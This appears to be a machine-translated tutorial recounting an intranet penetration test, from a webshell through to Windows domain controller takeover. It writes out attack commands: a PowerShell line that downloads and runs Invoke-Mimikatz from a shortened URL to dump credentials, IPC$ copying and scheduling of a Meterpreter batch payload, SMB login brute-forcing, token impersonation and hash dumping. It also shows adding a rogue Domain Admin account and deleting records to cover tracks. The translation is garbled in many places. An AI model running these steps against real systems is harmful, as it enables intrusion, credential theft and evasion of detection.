Objective
Intranet penetration test data is basically a lot of Daniel's article tells us how to think, but for me, such as the side dishes have been foggy.
So what kind of tools to use the intranet to unimpeded, became the people have always been the desire.
Today, I am in the spirit of all the teachers to share selfless, special will be three years to master, ask sister, the artifact obtained, after finishing, key knowledge points written out.
The relevant knowledge points are summarized as follows:
- To avoid payload generation, use the Veil
- An attempt by MSF to make a right under the Meterpreter
- MSF's BYPASSUAC attempt under Meterpreter
- Information Association in the process of intranet penetration testing
- Meterpreter route additions and related scans
- Powershell used under Meterpreter
- The Meterpreter Post module uses
- The use of the MSF custom-generated payload
- Process Injection Theft Token
In fact, the focus is not on the number of knowledge, we only need to focus on the more important connection points.
Share in order to facilitate everyone in the security pulse to communicate together, learn together, progress together (together zhuangbility).
First of all, the shell was given to me, nor is it the focus of the introduction here, so ignore it here.
The environment for penetration testing is detailed as follows:
- A Fortress Machine (Webshell machine): Windows Server 2012
- B Fortress Machine: Windows (PowerShell scan machine)
- C Fortress machine: Machine with domain management process Windows Server 2012
- D Fortress Machine Several
First step rebound
Meterpreter
In fact, every penetration test is not as smooth as we thought, and this time the beginning also means
We have a different journey, the entire penetration test process I spent almost four hours, most of the time is spent on solving these problems.
1 Webshell cannot upload exe
Originally thought of directly upload meterpreter payload direct rebound results found not upload, you can choose PowerShell Meterpreter module to achieve
2 Meterpreter reverse_tcp Module rebound unsuccessful
MSF's payload rebound, just starting with the module I used was Meterpreter's reverse_tcp module to try and find can bounce, but has been unable to build a successful meterpreter,
There must be some monitoring to discover our behavior. On this basis, try to meterpreter the Reverse_https module, successfully rebound success
The detailed diagram of the problems encountered and the resolution process is as follows:
Figure 1-1 Using payload
Figure 1-2 setting up payload for HTTPS
Figure 1-3 Rebound success
The second step is to try to raise power
Windows
Server
-
What was the first thing that came to mind when we first got a webshell (under-privileged)? That is certainly the right to mention, I also want to think of the same, first began our journey of right to lift.
First, using the MSF search module MS15, you will get some exploit modules. I tried ms15_05 and ms15_078 all ended in failure.
The detailed figure is as follows:
Figure 2-1 The attempt to extract power failed
The third step is to try the current account
BypassuacTest
Just started to forget to say one thing, that is Webshell itself, we currently Webshell is JSP, with the current user of a common domain permissions.
I also thought that is not possible through the BYPASSUAC to complete the right, but the test results can be imagined, another failure.
The details of the present situation are as follows:
Figure 3-1 Current User rights
Figure 3-2 Bypassuac Try
Fourth Step related information collection
When we are not successful at this time, we can still use the current user to conduct domain penetration testing. That
We currently have the following methods to conduct penetration test domains:
1 Collect information about the domain, including all users, all computers, and related key groups.
The following commands are commonly used:
NET user/domainnet Group "Domain Computers"/domainnet Group "Domain Admins"/domain #查看域管理员net localgroup Administrator SNet View/domain
2 collect information about SQL Server, if the current bastion machine uses SQL Servers, it happens that the user is the current domain user, we can use SQLCMD information collection, and scanning attacks.
Just mentioned here, because of the length of the matter, temporarily do not do a deep layer of discussion
Based on my penetration testing experience, I've just done the simplest information gathering here, first using sqlcmd to get a list of all machines for SQL Server, the current bastion machine name, the current bastion machine's IP,
There is also net view to do simple information gathering.
The detailed figure is as follows:
Figure 4-1 SQLCMD Get information
Figure 4-2 the current machine name
Figure 4-3 net view-related machine name
Fifth step information analysis, successfully obtain a server permissions
When our information is collected, we need to start thinking about what to do next.
First let's take a look at what we currently have:
- A a domain user's process permissions, the current bastion machine is Windows Server 2012, the power failure is raised. (If we can claim success, we still cannot obtain the user's plaintext password)
- B the user name of the current bastion machine
- C the name of the same installed SQL Server machine as the current sqlcmd gets to
At present, our ideas are:
- 1 Use Meterpreter's current permissions to add routes for weak password scanning
- 2 using PowerShell to scan the internal network (this penetration test used, but here for the time being not used), specifically, a little more slowly, of course, at this moment PowerShell is definitely an intranet penetration test another artifact
- 3 Use the current user rights to set up the socks4a, and then use the first step we get to the information socks for intranet scanning
- 4 Use the current user's permissions, the computer in the domain IPC, or dir overflow (that is, dir other computer C, if the successful representation of the permission) batch test
Through the above analysis, at this time I chose the most lazy method, the current fortress machine name and net view machine name to compare, to find a very similar number of machine names, manual testing.
The current speed is also very fast, in the attempt two times when the success.
The detailed procedure is as follows:
Net use \\ip\c$
tasklist/v/S IP
Figure 5-1 Net use test succeeded
Figure 5-2 tasklist Successful execution
Sixth Step Domain Information collection
First in the fourth step has already said the domain related information collection, here does not do too much introduction, this is on the basis of the fifth step to do the relevant collection, the relevant knowledge points are as follows:
1 Domain Information collection, with the following commands:
Net Group "Domain Admins"/domainnet group/domainnet Group "domain controllers"/domainnet Group "Enterprise Admins"/dom Ain
2 ipc$ invasion, everyone related words Baidu classic ipc$ invasion
Net use \\ip\c$
Copy Bat.bat \\ip\c$ (where Bat.bat is the meterpreter of PowerShell)
Net time \\ip
at \\ip time C:\bat.bat
3 Upload catch Clear tool 64.exe (Mimikatz artifact), everyone knows.
Upload/home/64.exe c \
Shell
CD \
64.Exe
4 Viewing the details of the crawled user
Net Use Xxx/domain
5 Use Meterpreter PS to view the list of processes for the relevant user
6 Attempt to use domain token impersonation
Use Incongnito
List_token-u
Impersonate_token xxxxxx
In this penetration test, I tried all the knowledge points mentioned above, in detail as follows:
Figure 6-1 Viewing a domain tube
Figure 6-2 Viewing a domain Group
Figure 6-3 Viewing a domain controller
Figure 6-4 Viewing the Enterprise management Group
Figure 6-5 Sharing copy data
Figure 6-6 Classic ipc$
Figure 6-7 Rebound Meterpreter success
Figure 6-8 Uploading a file
Figure 6-9 Viewing server information
Figure 6-10 Crawl Password
Figure 6-11 Viewing domain user rights
Figure 6-12 Viewing domain user rights
Figure 6-13 Stealing token attempts
Figure 6-14 Viewing the primary domain-controlled IP
Seventh Step
SMBRapid expansion Control permissions
What are you thinking of as a reader at this moment? is not when you see the sixth step of the time can go to bed, after all, it is five o'clock in the morning.
But at this moment as a professional seeking master, ask the sister, God of the people do not think so.
We have to do the final sprint, because the bell of the dawn has rung.
Let's take a look at what permissions we currently have:
There are two fortress machines, two user rights
At present, what we want to do is very simple, is the rapid expansion of control in the network, then how to do, in fact, is very simple, is the rapid scanning to complete our dream.
Specific as follows:
- 1 Use the currently acquired two user rights to quickly scan. (scan where, see the sixth step of the last picture 6-14, is the domain-controlled IP segment)
- 2 Smb_login Scan
- 3 Port forwarding into intranet
Now we have the idea, the artifact MSF has finally ushered in its own dream of evil heaven. Let's play happily.
Detailed knowledge points are as follows:
- 1 MSF Add routing route add IP mask SessionID
- 2 Smb_login module or use Psexec_scanner (this module requires you to search)
- 3 Meterpreter Port forwarding
- 4 MSF socks4a module (this penetration test is not used, but does not mean it is not good)
Figure 7-1 Setting parameters for Smb_login
Fig. 7-2 The machine for blasting success
Figure 7-3 Viewing the permissions that have been acquired
Figure 7-4 Port forwarding and currently owned permissions
Eighth step
PowershellGet the domain control Administrator online Machine
Intranet penetration Testing has to say two great artifacts: MSF and PowerShell, but see that everyone is basically separate to use, or that everyone in the process of penetration testing rarely encountered, today as a reader of you blessed.
First of all, the PowerShell in the network penetration test can not only sweep, can explode, can be forwarded, of course, can do more things,
The following three modules are commonly used:
- 1 Empire is said to be an artifact, it is indeed an artifact, I have not used, for the moment not much to say
- 2 PowerUp is said to mention the right artifact, is indeed an artifact, I seldom use. And for the moment, not much.
- 3 PowerView is said to be a domain penetration artifact, is indeed an artifact, I have been using, very beautiful
To say that the use of PowerShell, in fact, is very simple, but everyone in the process of using generally not too much attention,
There are three main ways to invoke:
1 is of course downloaded to local execution, detailed using methods such as the following connection: PowerShell "IEX (new-objectnet.webclient). Downloadstring (' Http://is.gd/oeoFuI '); Invoke-mimikatz-dumpcreds "
2 The second way is to upload PowerShell files to the Fortress machine local execution, Powershell.exe-exec Bypass-command "& {import-module. \powerview.ps1; Invoke-userhunter} "
3 upload to each other locally, and then import-module import, using all modules of Powerview is actually very simple, call the method directly, we look at the following diagram to know.
If you can see the start of your PowerShell journey here, the intranet will start to become simple.
Figure 8-1 Method of Powerview
Nonsense said so much, the following start our actual combat, in fact, very simple, I really want to say very simple, simple to a sentence to fix.
The Invoke-userhunter in Powerview is the machine that gets the current domain administrator to log on online.
We'll use it for further information on this journey. Details such as:
Figure 8-1 PowerShell execution command
Figure 8-2 Powerview Effect Show
Nineth Step domain Control administrator access
(windows2012Permissions
)
After the eighth step, as a reader you are not feeling a little bit of this harvest, intranet penetration test is not so helpless.
Artifact after the artifact, and see it Windows Server 2012, although the domain management online, but our grasp password artifact impotence, can not modify the registry, and so the administrator login again.
Now look at the problem we have, through PowerShell successfully get to the relevant domain control administrator online a machine Windows Server 2012, and with this machine permissions, then we go to take care of domain control.
Ideas are as follows:
- 1 Modify the registry wait for the domain administrator to log in again to crawl (the lily will be cool)
- 2 through the PowerUp process to inject Get domain permissions (no use of temporary abandonment), of course, here can also write plug-like function injection process to get permissions
- 3 MSF's token-stealing feature (this can be easily implemented)
Know the idea, then let's start our happy journey. I ask master, ask sister, Seek artifact, professional to seek domain control to:
1 also using IPC classic intrusion techniques, rebound meterpreter,
Getsysttem Permissions
Ps view the process in which domain management resides
Migrate PID Injection Process
2 continuation of classic ipc$ to domain control
Meterpreter Shell Below
Net use \ \ domain control ip\c$
Net time \ \ domain-controlled IP
Copy bat.bat \ \ domain control ip\c$
at \ \ domain-controlled IP time c:\bat.bat (unexpected error, hint Schtasks.exe, not cooked) { Safety Pulse Small Note: 08 and above at the command is discarded, all with schtasks scheduled tasks}
3 The path to success is more than one, add a domain pipe account
Net User Demo Demo/ad/domain
Net Group "Domain Admins" demo/ad/domain
At this point, we already have domain control permissions.
The details are as follows:
Figure 9-1 Injecting the domain tube process, connecting the domain control
Figure 9-2 Adding a Domain Admin account
Figure 9-3 See if Domain management is successful
Tenth step domain control I'm coming.
(MSF
PsExecRebound
Shell)
A look at the time, seven o'clock in the morning, the morning sun will rise up. What is your mood at the moment? It's time to run the morning. The East Sun is about to rise, the domain control of the authority has finally arrived.
First of all, there are many ways to log in to the domain control, the following I say I can know a few of it, I believe we also all know:
- 1 port forwarding or SOCKS logon domain Remote Desktop
- 2 Login to a computer in the other intranet use PsExec to bounce shell
- 3 using the MSF psexec rebound Meterpreter
Rebound needs to be aware of the knowledge to be used, we are using PSESEXC to rebound Meterpreter, which involves the following knowledge:
- 1 use of the PsExec module in MSF
- 2 Custom module use, with Meterpreter, in the case of payload inevitably kill how to use their own veil generated payload
Detailed use of the process such as:
Figure 10-1 PsExec performing the test
Figure 10-2 PsExec default Bounce not successful
Figure 10-3 Meterpreter's HTTPS module bounces successfully
Figure 10-4 Domain-controlled system Information
11th Step
MeterpreterGet all users '
Hash
With domain permissions, Dumphash is essential if we want to have a deep level of control.
First take a look at the knowledge we need:
- 1 MSF has two modules can be used, one is Hashdump, this module can only export local hash, you can know the test, and the other is Smart_hashdump, this module can be used to export the domain user's hash.
- 2 PowerShell There are modules that can be exported directly, let's try it yourself
- 3 use of Wce,mimikatz and other artifacts
Here I am using the Smart_hashdump module of MSF. It is important to note that in order to export the hash using this module, you must use the permissions of the system.
The detailed process is as follows:
Figure 11-1 Use of the Smart_hashdump module
The 12th step of the tortuous path of exploration
Here are some of the techniques used before, and some detours. Document it's almost done.
A journey from Webshell to domain control is completed, of course, here I take some detours in the process and points out, welcome everyone to correct, learn together.
Figure 12-1 Session Control chart
According to the above figure, I now control the Session total of 5, of which four are to be obtained, respectively, Session1,session2 session4,session5.
Where Session1 is obtained by Webshell rebound, the second session2 is information analysis obtained, session4 to get domain administrator acquired, session5 for the domain.
One of the Session3 is the detour I have been through, wasting time.
After that we have to complete the penetration test in order to better and more quickly and effectively, we usually try to practice the sword. Try to do not out of the sword is already, out of the sword see blood.
The 13th step I gently came, I walked softly, the Administrator, goodbye
(Clean
)
As a more successful friendship test, we have to do without shadow, go without a trace. So the finishing touches will also unfold quietly.
Relevant knowledge points are involved:
- 1 Delete the previously added Domain Admin account
- 2 Remove all tools used in the process
- 3 Delete all of your operation Records
- 4 Close all Meterpreter
In this process, we uploaded two files, a bar.bat, a 64-bit Mimikatz grab password tool,
You can delete it directly.
Figure 13-1 Deleting a user
Figure 13-2 Closing the session
Summarize
Sum up and say something good. or shout the slogan first------"Beg sister, Master, seek artifact".
Thank you for more than three years for my silently share of the teachers, thank the sister in I do this friendship test, she has been quietly accompany my side,
Thank you for all these years of the various artifacts, without the support of these resources, I will not complete this friendship test.
As a penetration testing enthusiasts, we have been striving to pursue the heart of that beautiful dream;
As a programmer, we simply want to coding. Life is so beautiful, why don't we join together and share the good.
Directory
Domain Penetration Testing Tutorial (Windows Server 2012) ............................................................................................ 1
Objective....................................................................................................................... ...................... 2
First step rebound Meterpreter .......................................................................................................... 2
The second step is to try to power Windows Server 2012 .... ..... ..... ..... ............ ....... ..... .................. ......... 4
The third step is to try the current account Bypassuac test ....... ..... ............... ....... ..... .................. ......... 5
Fourth Step related information collection ............................................................................................................... 6
Fifth step information analysis, successfully getting a server right ... ..... ... .... ... .... ... ..... ..... .... ..... ..... .............................. 8
Sixth Step Domain Information collection ................................................................................................................. 10
Seventh step SMB Rapid expansion control permissions ...... ..... ..... .................... ..... ..... ..... ..... ..... .............. .......... 16
The eighth step Powershell gets the domain control administrator online ..... ... ... ..... ... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ... and ..... ..... 18
Nineth Step Domain Control admin access (windows2012 permissions) ..... ..... ... ..... ..... ..... ..... ..... ..... ..... ..... .............. 20
Tenth step domain Control I'm here (MSF psexec rebound shell) ..... ..... .............. ....... ..... ....................... 22
The 11th step Meterpreter to get all the user's hash ......... ........... ....................... ........ 24
The 12th step of the tortuous path of exploration ..................................................................................................... 25
The 13th step I gently came, and I walked softly, the Administrator, Goodbye (Clean) ........ .................. 26
Summarize....................................................................................................................... .................... 27
A complete exploration path from Webshell to domain control